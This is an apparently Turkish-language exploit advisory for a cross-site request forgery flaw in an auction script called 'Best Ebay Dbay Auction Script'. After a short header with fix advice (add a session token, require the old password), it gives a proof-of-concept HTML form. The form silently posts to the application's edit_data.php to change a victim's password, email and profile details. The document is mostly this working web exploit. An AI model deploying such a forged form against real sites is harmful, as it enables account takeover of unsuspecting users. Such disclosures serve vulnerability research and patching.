< ------------------- header data start ------------------- >

#############################################################

# Application Name :Best Ebay Dbay Auction Script

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak user bilgileri degistirebilinir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >
< -- bug code start -- >
<FORM NAME=details ACTION=http://www.getaphpsite.com/demos/ebay/edit_data.php METHOD=POST>

<INPUT TYPE=password NAME=TPL_password SIZE=20 MAXLENGTH=20>
<INPUT TYPE=password NAME=TPL_repeat_password SIZE=20
<INPUT TYPE=text NAME=TPL_email SIZE=50 MAXLENGTH=50 VALUE=[email protected]>

<INPUT type=text name=TPL_birthdate size=10 maxlength=10 value=01/01/1990>
<INPUT TYPE=text NAME=TPL_address SIZE=40 MAXLENGTH=255
<INPUT TYPE=text NAME=TPL_city SIZE=25 MAXLENGTH=25 VALUE=asadasdas>
<INPUT TYPE=text NAME=TPL_prov SIZE=10 MAXLENGTH=10 VALUE=sadasd>
<INPUT TYPE=text NAME=TPL_zip SIZE=8 MAXLENGTH=6 VALUE=06850>
<INPUT TYPE=text NAME=TPL_phone SIZE=40 MAXLENGTH=40 VALUE=054154542524>
<input type=radio name=TPL_nletter value=1 CHECKED >
YES
<input type=radio name=TPL_nletter value=2 >
<input type=submit name=Input>
<input type=reset name=Input>
<INPUT type=hidden NAME=action VALUE=update>

</FORM>
< -- bug code end of -- >